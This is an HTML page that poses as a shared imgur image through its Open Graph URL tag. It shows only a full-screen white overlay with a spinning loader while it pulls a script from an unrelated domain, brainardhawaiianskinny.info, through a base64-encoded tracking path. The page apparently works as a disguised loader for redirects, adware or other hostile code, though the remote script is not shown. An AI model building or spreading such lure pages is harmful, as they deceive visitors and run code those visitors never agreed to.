

<!DOCTYPE html>
<html lang="en">
<head>
    <meta property="og:url" content="http://i.imgur.com/MQp6cdt.jpg"/>
</head>


<body>
<style type="text/css">
    #circularG {
        position: fixed;
        top: 50%;
        left: 50%;
        margin-top: -52px;
        margin-left: -52px;
        width: 105px;
        height: 105px
    }

    .circularG {
        position: absolute;
        background-color: #000;
        width: 25px;
        height: 25px;
        border-radius: 16px;
        -o-border-radius: 16px;
        -ms-border-radius: 16px;
        -webkit-border-radius: 16px;
        -moz-border-radius: 16px;
        animation-name: bounce_circularG;
        -o-animation-name: bounce_circularG;
        -ms-animation-name: bounce_circularG;
        -webkit-animation-name: bounce_circularG;
        -moz-animation-name: bounce_circularG;
        animation-duration: 1.1s;
        -o-animation-duration: 1.1s;
        -ms-animation-duration: 1.1s;
        -webkit-animation-duration: 1.1s;
        -moz-animation-duration: 1.1s;
        animation-iteration-count: infinite;
        -o-animation-iteration-count: infinite;
        -ms-animation-iteration-count: infinite;
        -webkit-animation-iteration-count: infinite;
        -moz-animation-iteration-count: infinite;
        animation-direction: normal;
        -o-animation-direction: normal;
        -ms-animation-direction: normal;
        -webkit-animation-direction: normal;
        -moz-animation-direction: normal
    }

    #circularG_1 {
        left: 0;
        top: 42px;
        animation-delay: .41s;
        -o-animation-delay: .41s;
        -ms-animation-delay: .41s;
        -webkit-animation-delay: .41s;
        -moz-animation-delay: .41s
    }

    #circularG_2 {
        left: 11px;
        top: 11px;
        animation-delay: .55s;
        -o-animation-delay: .55s;
        -ms-animation-delay: .55s;
        -webkit-animation-delay: .55s;
        -moz-animation-delay: .55s
    }

    #circularG_3 {
        top: 0;
        left: 42px;
        animation-delay: .69s;
        -o-animation-delay: .69s;
        -ms-animation-delay: .69s;
        -webkit-animation-delay: .69s;
        -moz-animation-delay: .69s
    }

    #circularG_4 {
        right: 11px;
        top: 11px;
        animation-delay: .83s;
        -o-animation-delay: .83s;
        -ms-animation-delay: .83s;
        -webkit-animation-delay: .83s;
        -moz-animation-delay: .83s
    }

    #circularG_5 {
        right: 0;
        top: 42px;
        animation-delay: .97s;
        -o-animation-delay: .97s;
        -ms-animation-delay: .97s;
        -webkit-animation-delay: .97s;
        -moz-animation-delay: .97s
    }

    #circularG_6 {
        right: 11px;
        bottom: 11px;
        animation-delay: 1.1s;
        -o-animation-delay: 1.1s;
        -ms-animation-delay: 1.1s;
        -webkit-animation-delay: 1.1s;
        -moz-animation-delay: 1.1s
    }

    #circularG_7 {
        left: 42px;
        bottom: 0;
        animation-delay: 1.24s;
        -o-animation-delay: 1.24s;
        -ms-animation-delay: 1.24s;
        -webkit-animation-delay: 1.24s;
        -moz-animation-delay: 1.24s
    }

    #circularG_8 {
        left: 11px;
        bottom: 11px;
        animation-delay: 1.38s;
        -o-animation-delay: 1.38s;
        -ms-animation-delay: 1.38s;
        -webkit-animation-delay: 1.38s;
        -moz-animation-delay: 1.38s
    }

    @keyframes bounce_circularG {
        0% {
            transform: scale(1)
        }
        100% {
            transform: scale(.3)
        }
    }

    @-o-keyframes bounce_circularG {
        0% {
            -o-transform: scale(1)
        }
        100% {
            -o-transform: scale(.3)
        }
    }

    @-ms-keyframes bounce_circularG {
        0% {
            -ms-transform: scale(1)
        }
        100% {
            -ms-transform: scale(.3)
        }
    }

    @-webkit-keyframes bounce_circularG {
        0% {
            -webkit-transform: scale(1)
        }
        100% {
            -webkit-transform: scale(.3)
        }
    }

    @-moz-keyframes bounce_circularG {
        0% {
            -moz-transform: scale(1)
        }
        100% {
            -moz-transform: scale(.3)
        }
    }
</style>

<script type="text/javascript">
    var overLayer = document.createElement("div");
    overLayer.style.cssText = "position: fixed; top: 0px; left: 0px; background-color:#FFFFFF; width:100%; height:100%; z-index: 99999;";
    overLayer.innerHTML = "<div id=\"circularG\">\r\n\t<div id=\"circularG_1\" class=\"circularG\"><\/div>\r\n\t<div id=\"circularG_2\" class=\"circularG\"><\/div>\r\n\t<div id=\"circularG_3\" class=\"circularG\"><\/div>\r\n\t<div id=\"circularG_4\" class=\"circularG\"><\/div>\r\n\t<div id=\"circularG_5\" class=\"circularG\"><\/div>\r\n\t<div id=\"circularG_6\" class=\"circularG\"><\/div>\r\n\t<div id=\"circularG_7\" class=\"circularG\"><\/div>\r\n\t<div id=\"circularG_8\" class=\"circularG\"><\/div>\r\n<\/div>";
    document.body.appendChild(overLayer);
</script>




<script data-cfasync="false" type="text/javascript"
src="http://brainardhawaiianskinny.info/PPDaIeyJyb3V0ZSI6ICJnZXRfanMiLCAic3RpZCI6ICIxNjIwIiwgImQiOiAiYnJhaW5hcmRoYXdhaWlhbnNraW5ueS5pbmZvIn0=DwJx6"></script>

</body>

</html>
